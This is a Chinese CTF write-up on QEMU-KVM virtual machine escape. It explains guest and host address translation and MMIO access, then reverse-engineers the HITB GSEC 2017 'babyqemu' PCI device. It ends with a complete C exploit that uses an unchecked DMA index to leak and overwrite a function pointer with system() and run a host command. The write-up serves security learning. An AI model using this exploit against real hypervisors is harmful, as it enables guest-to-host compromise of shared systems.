Qemu-KVM逃逸-0x01

Qemu-KVM逃逸-0x01

Created
Oct 20, 2021 09:32 AM
Tags
 

Qemu-kvm原理

notion image
 
notion image
  1. Qemu是一个通用的开源机器模拟器和虚拟器
      • 模拟各种架构的硬件,使用二进制翻译技术
      • 创建虚拟机,通过ioctl与内核KVM模块进行交互
  1. Qemu为每个虚拟机创建一个进程,进程中,为每个虚拟CPU创建一个线程,Guest系统和应用都运行在虚拟CPU
  1. Qemu可以模拟I/O 处理,执行流程:虚拟机中进行I/O 操作 → 进入KVM → KVM进行判断处理并将控制权交给Qemu,由Qemu来模拟I/O 设备去响应虚拟机中的I/O 请求
  1. KVMLinux系统的内核模块,实现CPU的虚拟化、内存的虚拟化
 
 

内存布局

  1. GVA : guest virtual address 虚拟机中的虚拟地址
  1. GPA : guest physical address 虚拟机中的物理地址
  1. HVA : host virtual address 宿主机中的虚拟地址
  1. HPA : host physical address 宿主机中的物理地址
 
示意图如下所示:
Guest' processes
                     +--------------------+
Virtual addr space   |                    |
                     +--------------------+GVA|                    |
                     \__   Page Table     \__
                        \                    \
                         |                    |  Guest kernel
                    +----+--------------------+----------------+
Guest's phy  memory |    |                    |                |GPA+----+--------------------+----------------+
                    |                                          |
                    \__                                        \__
                       \                                          \
                        |             QEMU process                 |
                   +----+------------------------------------------+
Virtual addr space |    |                                          |HVA+----+------------------------------------------+
                   |                                               |
                    \__                Page Table                   \__
                       \                                               \
                        |                                               |
                   +----+-----------------------------------------------+----+
Physical memory    |    |                                               |    |HPA+----+-----------------------------------------------+----+
 
地址转换:GVA → GPA → HVA → HPA
 
GPA是宿主机进程mmap出来的内存
 
测试代码:
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <stdlib.h>
#include <fcntl.h>
#include <assert.h>
#include <inttypes.h>
 
#define PAGE_SHIFT  12
#define PAGE_SIZE   (1 << PAGE_SHIFT)    //4096
#define PFN_PRESENT (1ull << 63)
#define PFN_PFN     ((1ull << 55) - 1)
 
int fd;
 
uint64_t page_offset(uint64_t addr)
{
    return addr & ((1 << PAGE_SHIFT) - 1);
}
 
uint64_t gva_to_gfn(void *addr)
{
    uint64_t pme, gfn;
    size_t offset;
    offset = ((uintptr_t)addr >> 9) & ~7;
    lseek(fd, offset, SEEK_SET);
    read(fd, &pme, 8);
    if (!(pme & PFN_PRESENT))
        return -1;
    gfn = pme & PFN_PFN;
    return gfn;
}
 
uint64_t gva_to_gpa(void *addr)
{
    uint64_t gfn = gva_to_gfn(addr);//这里的addr属于gva,获取对应的page frame number
    assert(gfn != -1);
    return (gfn << PAGE_SHIFT) | page_offset((uint64_t)addr);//返回对应的GPA
}
 
int main()
{
    uint8_t *ptr;
    uint64_t ptr_mem;
 
    fd = open("/proc/self/pagemap", O_RDONLY);    //通过读取pagemap文件,可以得到进程从虚拟地址到物理地址映射的信息
    if (fd < 0) {
        perror("open");
        exit(1);
    }
 
    ptr = malloc(256);            //首先开256的空间
    strcpy(ptr, "Where am I?"); //将字符串拷贝过去
    printf("%s\n", ptr);       
    ptr_mem = gva_to_gpa(ptr);    //guest virtual mem -> guest physicals mem
 
    //此时的ptr_mem对应的是虚拟机里字符串所在的物理内存地址。
    printf("Your physical address is at 0x%"PRIx64"\n", ptr_mem);
 
    getchar();
    return 0;
}
 
编译命令:gcc mmu.c -static -o mmu
Qemu来启动一个虚拟机,把编译好的程序放进去运行
notion image
再通过gdb attachqemu的进程上,search查找字符串
notion image
计算起始地址:
>>> hex(0x7fb153819880-0x3a19880)
'0x7fb14fe00000'
>>>
 
gdb中使用vmmap命令查看qemu的地址空间
notion image
综上所述,0x7fb14fe00000就是虚拟机物理地址为0的位置。
 

DMA

DMA本身不属于某一类外设,它是一种外设与内存传输数据的方式。
 
 

PCI设备地址空间

PCI可以申请两类地址空间,分别是memory space I/O space
通过memory space访问设备I/O的方式称为memory mapped I/OMMIO,在MMIO中,内存和I/O设备共享同一个地址空间。
 

Qemu中访问I/O空间

用户态访问,通过映射resource0文件实现内存的访问
#include <assert.h>
#include <fcntl.h>
#include <inttypes.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <unistd.h>
#include<sys/io.h>


unsigned char* mmio_mem;

void die(const char* msg)
{
    perror(msg);
    exit(-1);
}



void mmio_write(uint32_t addr, uint32_t value)
{
    *((uint32_t*)(mmio_mem + addr)) = value;
}

uint32_t mmio_read(uint32_t addr)
{
    return *((uint32_t*)(mmio_mem + addr));
}




int main(int argc, char *argv[])
{

    // Open and map I/O memory for the strng device
    int mmio_fd = open("/sys/devices/pci0000:00/0000:00:04.0/resource0", O_RDWR | O_SYNC);
    if (mmio_fd == -1)
        die("mmio_fd open failed");

    mmio_mem = mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, mmio_fd, 0);
    if (mmio_mem == MAP_FAILED)
        die("mmap mmio_mem failed");

    printf("mmio_mem @ %p\n", mmio_mem);

    mmio_read(0x128);
        mmio_write(0x128, 1337);

}
 
 
 

hitb gesc 2017 babyqemu 逃逸

题目附件信息:
ls -al
总用量 51524
drwxr-xr-x  4 root root     4096 Oct 21 11:54 .
drwx------ 88 root root     4096 Oct 21 12:08 ..
drwxr-xr-x 17 root root     4096 Oct 20 14:54 file  #rootfs.cpio 解压出来的文件系统
-rwxr-xr-x  1 root root      291 Oct 21 11:52 launch.sh#启动VM命令
drwxr-xr-x  6 root root     4096 Jul 11  2017 pc-bios
-rwxr-xr-x  1 root root 39682064 Jul 11  2017 qemu-system-x86_64
-rw-r--r--  1 root root  5734400 Oct 21 11:49 rootfs.cpio#文件系统
-rwxr-xr-x  1 root root  7308672 Jul 11  2017 vmlinuz-4.8.0-52-generic#linux内核文件
 
启动命令:
cat launch.sh 
#! /bin/sh
./qemu-system-x86_64 \
-initrd ./rootfs.cpio \
-kernel ./vmlinuz-4.8.0-52-generic \
-append 'console=ttyS0 root=/dev/ram oops=panic panic=1' \
-enable-kvm \
-monitor /dev/null \
-m 64M --nographic  -L ./dependency/usr/local/share/qemu \
-L pc-bios \
-device hitb,id=vda
关键点是-device hitb,表明了该VM系统中存在一个hitb驱动设备
 
qemu-system-x86_64载入IDA中,发现是是存在符号的,通过函数名中的关键字筛选出一些关键函数如下所示:
notion image
 
首先看函数pci_hitb_register_types,该函数是进行PCI设备注册
void __cdecl pci_hitb_register_types()
{
  type_register_static(&hitb_info_27046);
}
通过查看hitb_info_27046,得到class_init和instance_init对应的实例
notion image
 
在local_type中通过搜索关键字找到相关的结构体
notion image
 
hitb_class_init函数中,设置了PCI配置的一些信息
void __fastcall hitb_class_init(ObjectClass_0 *a1, void *data)
{
  PCIDeviceClass *v2; // rax

  v2 = object_class_dynamic_cast_assert(
         a1,
         &stru_64A230.bulk_in_pending[2].data[72],
         &stru_5AB2C8.msi_vectors,
         469,
         "hitb_class_init");
  v2->revision = 16;
  v2->class_id = 255;
  v2->realize = pci_hitb_realize;
  v2->exit = pci_hitb_uninit;
  v2->vendor_id = 0x1234;
  v2->device_id = 0x2333;
}
 
运行VM,使用lspci命令查看pci设备,可以看到最后一个就是hitb
Welcome to HITB
HITB login: root
# lspci
00:00.0 Class 0600: 8086:1237
00:01.3 Class 0680: 8086:7113
00:03.0 Class 0200: 8086:100e
00:01.1 Class 0101: 8086:7010
00:02.0 Class 0300: 1234:1111
00:01.0 Class 0601: 8086:7000
00:04.0 Class 00ff: 1234:2333
#
 
hitb_instance_init函数中初始化了HitbState->enc的初始值
void __fastcall hitb_instance_init(Object_0 *obj)
{
  HitbState *v1; // rax

  v1 = object_dynamic_cast_assert(
         obj,
         &stru_5AB2C8.not_legacy_32bit + 12,
         &stru_5AB2C8.msi_vectors,
         459,
         "hitb_instance_init");
  v1->dma_mask = 0xFFFFFFFLL;
  v1 = (v1 + 7104);
  *(&v1[-1].dma_mask + 1) = hitb_enc;           // 初始化了HitbState结构中enc的地址
  object_property_add(
    obj,
    &stru_5AB2C8.server_bar2.coalesced.tqh_first + 3,
    "uint64",
    hitb_obj_uint64,
    hitb_obj_uint64,
    0LL,
    v1,
    0LL);
}
 
pci_hitb_realize函数中,首先是添加了一个qemu-timer,也就是说,会定时执行指定函数。此处该函数是hitb_dma_timer,接着注册了hitb_mmio_ops结构体,指明了读写时具体是哪个函数操作的。分别是hitb_mmio_readhitb_mmio_write
 
hitb_mmio_read函数中,第二个参数决定函数返回哪块区域内存。
uint64_t __fastcall hitb_mmio_read(HitbState *opaque, hwaddr addr, unsigned int size)
{
  uint64_t result; // rax
  uint64_t val; // [rsp+0h] [rbp-20h]

  result = -1LL;
  if ( size == 4 )
  {
    if ( addr == 128 )
      return opaque->dma.src;
    if ( addr > 0x80 )
    {
      if ( addr == 140 )
        return *(dma_addr_t *)((char *)&opaque->dma.dst + 4);
      if ( addr <= 0x8C )
      {
        if ( addr == 132 )
          return *(dma_addr_t *)((char *)&opaque->dma.src + 4);
        if ( addr == 136 )
          return opaque->dma.dst;
      }
      else
      {
        if ( addr == 144 )
          return opaque->dma.cnt;
        if ( addr == 152 )
          return opaque->dma.cmd;
      }
    }
    else
    {
      if ( addr == 8 )
      {
        qemu_mutex_lock(&opaque->thr_mutex);
        val = opaque->fact;
        qemu_mutex_unlock(&opaque->thr_mutex);
        return val;
      }
      if ( addr <= 8 )
      {
        result = 16777453LL;
        if ( !addr )
          return result;
        if ( addr == 4 )
          return opaque->addr4;
      }
      else
      {
        if ( addr == 32 )
          return opaque->status;
        if ( addr == 36 )
          return opaque->irq_status;
      }
    }
    result = -1LL;
  }
  return result;
}
 
hitb_mmio_write函数中,第二个参数决定要改的区域,第三个参数决定值。
  • addr=0x80 , opaque->dma.src = val
  • addr=0x84 , *(dma_addr_t *)((char *)&opaque->dma.src + 4) = val
  • addr=0x88 , opaque->dma.dst = val
  • addr=0x8c , *(dma_addr_t *)((char *)&opaque->dma.dst + 4) = val;
  • addr=0x90 , opaque->dma.cnt = val;
  • addr=0x98 , opaque->dma.cmd = val;并调用timer_mod激活定时器
 
hitb_dma_timer函数中根据 opaque->dma.cmd的值来决定做什么操作
  • opaque->dma.cmd=1|2|4时,先设置v2 = (unsigned int)(LODWORD(opaque->dma.src) - 0x40000);,接着执行opaque->enc(&opaque->dma_buf[v2], opaque->dma.cnt);调用cpu_physical_memory_rw函数将&opaque->dma_buf[v2]拷贝到opaque->dma.dst拷贝长度为opaque->dma.cnt
  • opaque->dma.cmd=1|2时,不加密,直接拷贝
  • opaque->dma.cmd=1|0时,从src中长度为cnt的内容拷贝到dma_buf中
 
 
漏洞所在dma.src是我们可以控制的,利用dma.cmd=1|2|4可以任意地址读,利用dma.cmd=1|0可以实现任意地址写
enc函数指着在buf之后,并且可以控制程序能够执行到enc函数,攻击思路就可以enc函数指针覆盖成system,参数&opaque->dma_buf[v2];改成想要执行的命令即可。
 
 
 
exp:
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <errno.h>
#include <signal.h>
#include <fcntl.h>
#include <ctype.h>
#include <termios.h>
#include <assert.h>

#include <sys/types.h>
#include <sys/mman.h>
#include <sys/io.h>

#define MAP_SIZE 4096UL
#define MAP_MASK (MAP_SIZE - 1)

#define DMA_BASE 0x40000


#define PAGE_SHIFT  12
#define PAGE_SIZE   (1 << PAGE_SHIFT)
#define PFN_PRESENT (1ull << 63)
#define PFN_PFN     ((1ull << 55) - 1)

char* pci_device_name = "/sys/devices/pci0000:00/0000:00:04.0/resource0";

unsigned char* tmpbuf;
uint64_t tmpbuf_phys_addr;
unsigned char* mmio_base;

unsigned char* getMMIOBase(){
    
    int fd;
    if((fd = open(pci_device_name, O_RDWR | O_SYNC)) == -1) {
        perror("open pci device");
        exit(-1);
    }
    mmio_base = mmap(0, MAP_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
    if(mmio_base == (void *) -1) {
        perror("mmap");
        exit(-1);
    }
    return mmio_base;
}

// 获取页内偏移
uint32_t page_offset(uint32_t addr)
{
    // addr & 0xfff
    return addr & ((1 << PAGE_SHIFT) - 1);
}

uint64_t gva_to_gfn(void *addr)
{
    uint64_t pme, gfn;
    size_t offset;

    int fd;
    fd = open("/proc/self/pagemap", O_RDONLY);
    if (fd < 0) {
        perror("open");
        exit(1);
    }

    // printf("pfn_item_offset : %p\n", (uintptr_t)addr >> 9);
    offset = ((uintptr_t)addr >> 9) & ~7;

    ////下面是网上其他人的代码,只是为了理解上面的代码
    //一开始除以 0x1000  (getpagesize=0x1000,4k对齐,而且本来低12位就是页内索引,需要去掉),即除以2**12, 这就获取了页号了,
    //pagemap中一个地址64位,即8字节,也即sizeof(uint64_t),所以有了页号后,我们需要乘以8去找到对应的偏移从而获得对应的物理地址
    //最终  vir/2^12 * 8 = (vir / 2^9) & ~7 
    //这跟上面的右移9正好对应,但是为什么要 & ~7 ,因为你  vir >> 12 << 3 , 跟vir >> 9 是有区别的,vir >> 12 << 3低3位肯定是0,所以通过& ~7将低3位置0
    // int page_size=getpagesize();
    // unsigned long vir_page_idx = vir/page_size;
    // unsigned long pfn_item_offset = vir_page_idx*sizeof(uint64_t);

    lseek(fd, offset, SEEK_SET);
    read(fd, &pme, 8);
    // 确保页面存在——page is present.
    if (!(pme & PFN_PRESENT))
        return -1;
    // physical frame number 
    gfn = pme & PFN_PFN;
    return gfn;
}

uint64_t gva_to_gpa(void *addr)
{

    uint64_t gfn = gva_to_gfn(addr);
    assert(gfn != -1);
    return (gfn << PAGE_SHIFT) | page_offset((uint64_t)addr);
}

void mmio_write(uint64_t addr, uint64_t value)
{
    *((uint64_t*)(mmio_base + addr)) = value;
}

uint64_t mmio_read(uint64_t addr)
{
    return *((uint64_t*)(mmio_base + addr));
}

void set_cnt(uint64_t val)
{
    mmio_write(144, val);
}

void set_src(uint64_t val)
{
    mmio_write(128, val);
}

void set_dst(uint64_t val)
{
    mmio_write(136, val);
}

void start_dma_timer(uint64_t val){
    mmio_write(152, val);
}

void dma_read(uint64_t offset, uint64_t  cnt){

    // 设置dma_buf的索引
    set_src(DMA_BASE + offset);
    // 设置读取后要写入的物理地址
    set_dst(tmpbuf_phys_addr);
    // 设置读取的大小
    set_cnt(cnt);
    // 触发hitb_dma_timer
    start_dma_timer(1|2);
    // 等待上面的执行完
    sleep(1);
}

void dma_write(uint64_t offset, char* buf, uint64_t  cnt)
{
    // 将我们要写的内容先复制到tmpbuf
    memcpy(tmpbuf, buf, cnt);
    //设置物理地址(要从这读取写到dma_buf[opaque->dma.dst-0x40000])
    set_src(tmpbuf_phys_addr);
    // 设置dma_buf的索引
    set_dst(DMA_BASE + offset);
    // 设置写入大小
    set_cnt(cnt);
    // 触发hitb_dma_timer
    start_dma_timer(1);
    // 等待上面的执行完
    sleep(1);
}

void dma_write_qword(uint64_t offset, uint64_t val)
{
    dma_write(offset, (char *)&val, 8);
}

void dma_enc_read(uint64_t offset, uint64_t  cnt)
{
    // 设置dma_buf的索引
    set_src(DMA_BASE + offset);
    // 设置读取后要写入的物理地址
    set_dst(tmpbuf_phys_addr);
    // 设置读取的大小
    set_cnt(cnt);
    // 触发hitb_dma_timer
    start_dma_timer(1|2|4);
    // 等待上面的执行完
    sleep(1);
}

int main(int argc, char const *argv[])
{
    getMMIOBase();
    printf("mmio_base Resource0Base: %p\n", mmio_base);

    tmpbuf = malloc(0x1000);
    tmpbuf_phys_addr = gva_to_gpa(tmpbuf);
    printf("gva_to_gpa tmpbuf_phys_addr %p\n", (void*)tmpbuf_phys_addr);

    //just test
    // dma_write(0, "giantbranch", 11);
    // dma_read(0, 11);
    // printf("tmpbuf: %s\n", tmpbuf);


    // 将enc函数指针写到tmpbuf_phys_addr,之后通过tmpbuf读出即可
    dma_read(4096, 8);
    uint64_t hitb_enc_addr = *((uint64_t*)tmpbuf);
    uint64_t binary_base_addr = hitb_enc_addr - 0x283DD0;
    uint64_t system_addr = binary_base_addr + 0x1FDB18;
    printf("hitb_enc_addr: 0x%lx\n", hitb_enc_addr);
    printf("binary_base_addr: 0x%lx\n", binary_base_addr);
    printf("system_addr: 0x%lx\n", system_addr);

    // 覆盖enc函数指针为system地址
    dma_write_qword(4096, system_addr);

    
    // 将我们要执行的命令复制到tmpbuf中
    // char* command = "gnome-calculator";
    // char* command = "pwd";
    char* command = "uname -a";
    dma_write(0x200, command, strlen(command));

    // 触发hitb_dma_timer中的enc函数,从而调用syetem
    // 下面的666设置的是cnt,可以是任意值,没什么影响
    dma_enc_read(0x200, 666);
    
    return 0;
}
攻击效果:
notion image